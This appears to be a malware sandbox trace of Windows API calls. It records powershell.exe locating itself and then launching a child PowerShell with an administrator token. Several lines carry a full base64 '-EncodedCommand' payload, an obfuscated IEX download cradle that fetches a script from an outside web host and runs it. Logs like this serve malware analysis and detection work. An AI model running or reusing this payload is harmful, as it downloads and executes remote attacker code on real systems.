	[0337.717] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.717] SetErrorMode (uMode=0x1) returned 0x1
	[0337.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.717] SetErrorMode (uMode=0x1) returned 0x1
	[0337.717] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.718] SetErrorMode (uMode=0x1) returned 0x1
	[0337.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.718] SetErrorMode (uMode=0x1) returned 0x1
	[0337.718] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.718] SetErrorMode (uMode=0x1) returned 0x1
	[0337.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.718] SetErrorMode (uMode=0x1) returned 0x1
	[0337.719] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.719] SetErrorMode (uMode=0x1) returned 0x1
	[0337.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.719] SetErrorMode (uMode=0x1) returned 0x1
	[0337.719] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.719] SetErrorMode (uMode=0x1) returned 0x1
	[0337.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.720] SetErrorMode (uMode=0x1) returned 0x1
	[0337.720] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.720] SetErrorMode (uMode=0x1) returned 0x1
	[0337.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.720] SetErrorMode (uMode=0x1) returned 0x1
	[0337.720] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.721] SetErrorMode (uMode=0x1) returned 0x1
	[0337.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.721] SetErrorMode (uMode=0x1) returned 0x1
	[0337.721] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.721] SetErrorMode (uMode=0x1) returned 0x1
	[0337.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.721] SetErrorMode (uMode=0x1) returned 0x1
	[0337.722] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.722] SetErrorMode (uMode=0x1) returned 0x1
	[0337.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0337.722] SetErrorMode (uMode=0x1) returned 0x1
	[0337.722] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.722] SetErrorMode (uMode=0x1) returned 0x1
	[0337.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0337.723] SetErrorMode (uMode=0x1) returned 0x1
	[0337.723] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.723] SetErrorMode (uMode=0x1) returned 0x1
	[0337.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0337.723] SetErrorMode (uMode=0x1) returned 0x1
	[0337.723] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.724] SetErrorMode (uMode=0x1) returned 0x1
	[0337.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0337.724] SetErrorMode (uMode=0x1) returned 0x1
	[0337.724] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.724] SetErrorMode (uMode=0x1) returned 0x1
	[0337.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0337.725] SetErrorMode (uMode=0x1) returned 0x1
	[0337.725] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.725] SetErrorMode (uMode=0x1) returned 0x1
	[0337.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0337.725] SetErrorMode (uMode=0x1) returned 0x1
	[0337.725] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x116590
	[0337.726] FindNextFileW (in: hFindFile=0x116590, lpFindFileData=0x1c72dc70 | out: lpFindFileData=0x1c72dc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0337.727] FindClose (in: hFindFile=0x116590 | out: hFindFile=0x116590) returned 1
	[0337.727] SetErrorMode (uMode=0x1) returned 0x1
	[0337.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c72dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0337.728] SetErrorMode (uMode=0x1) returned 0x1
	[0337.728] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c72df90 | out: lpFileInformation=0x1c72df90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0337.728] SetErrorMode (uMode=0x1) returned 0x1
	[0337.729] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0337.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.729] CoTaskMemFree (pv=0xed700) 
	[0337.731] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0337.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.731] CoTaskMemFree (pv=0xed700) 
	[0338.181] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0338.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.181] CoTaskMemFree (pv=0xed700) 
	[0338.191] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0338.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.191] CoTaskMemFree (pv=0xed700) 
	[0338.204] CoTaskMemAlloc (cb=0x3b) returned 0x1b823570
	[0338.204] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c72e178, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c72e178) returned 0x4550
	[0338.205] CoTaskMemFree (pv=0x1b823570) 
	[0338.208] GetConsoleWindow () returned 0x10214
	[0338.215] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0338.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.215] CoTaskMemFree (pv=0xed700) 
	[0338.216] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0338.216] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0338.216] CoTaskMemFree (pv=0xed700) 
	[0338.222] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0338.222] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0338.222] CoTaskMemFree (pv=0xed700) 
	[0338.225] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c72e1c0 | out: pNumArgs=0x1c72e1c0) returned 0x1b809bd0*=""
	[0338.226] lstrlenW (lpString="-EncodedCommand") returned 15
	[0338.680] CoTaskMemAlloc (cb=0x22) returned 0x1b82fd70
	[0338.680] RtlMoveMemory (in: Destination=0x1b82fd70, Source=0x1b809bf2, Length=0x20 | out: Destination=0x1b82fd70) 
	[0338.680] CoTaskMemFree (pv=0x1b82fd70) 
	[0338.680] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0338.680] CoTaskMemAlloc (cb=0x2f4) returned 0x1b80e620
	[0338.680] RtlMoveMemory (in: Destination=0x1b80e620, Source=0x1b809c12, Length=0x2f2 | out: Destination=0x1b80e620) 
	[0338.680] CoTaskMemFree (pv=0x1b80e620) 
	[0338.681] LocalFree (hMem=0x1b809bd0) returned 0x0
	[0338.682] CoTaskMemAlloc (cb=0x804) returned 0x1b829eb0
	[0338.682] GetConsoleTitleW (in: lpConsoleTitle=0x1b829eb0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0338.682] CoTaskMemFree (pv=0x1b829eb0) 
	[0338.691] CoTaskMemAlloc (cb=0x38e) returned 0x1b809bd0
	[0338.691] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c72e120*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ec6560 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2ec6560*(hProcess=0x364, hThread=0x360, dwProcessId=0x9c4, dwThreadId=0xbec)) returned 1
	[0338.833] CoTaskMemFree (pv=0x1b809bd0) 
	[0338.834] CloseHandle (hObject=0x360) returned 1
	[0338.834] CoTaskMemAlloc (cb=0x3b) returned 0x1b823570
	[0338.834] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c72e1c8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c72e1c8) returned 0x4550
	[0338.835] CoTaskMemFree (pv=0x1b823570) 
	[0338.838] GetCurrentProcess () returned 0xffffffffffffffff
	[0338.838] GetCurrentProcess () returned 0xffffffffffffffff
	[0338.839] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x364, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c72e2a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c72e2a8*=0x360) returned 1

Process:
	id = "16"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2fce2000"
	os_pid = "0x890"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 97
	os_tid = 0xa6c

	[0283.403] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0287.481] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0287.481] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0287.481] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0287.481] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0292.026] sprintf_s (in: _DstBuf=0x14f178, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0294.998] GetVersionExW (in: lpVersionInformation=0x14dc80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dc80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0295.608] GetVersionExW (in: lpVersionInformation=0x14dc80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dc80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0295.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
